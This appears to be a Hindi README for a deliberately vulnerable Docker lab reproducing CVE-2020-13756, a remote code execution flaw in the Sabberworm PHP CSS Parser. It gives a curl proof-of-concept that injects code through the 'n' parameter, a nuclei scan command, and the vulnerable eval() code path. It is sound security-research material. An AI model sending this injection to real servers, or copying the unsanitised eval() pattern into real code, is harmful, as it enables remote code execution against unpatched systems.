
CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) के लिए कमजोर परीक्षण वातावरण
| फ़ील्ड | मान |
|---|
| CVE | CVE-2020-13756 |
| उत्पाद | Sabberworm PHP CSS Parser |
| असुरक्षित संस्करण | < 8.3.1 |
| गंभीरता | गंभीर (CVSS 9.8) |
| प्रकार | रिमोट कोड निष्पादन |
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)
या क्लोन करें और चलाएं:
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env
# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"
अपेक्षित आउटपुट में शुरुआत में VULN_TEST शामिल है, जो कोड निष्पादन को सिद्ध करता है।
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug
यह भेद्यता getSelectorsBySpecificity() फ़ंक्शन में मौजूद है जो अस्वच्छित उपयोगकर्ता इनपुट को eval() में पास करता है:
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')
यह वातावरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।
KrE80r - सुरक्षा अनुसंधान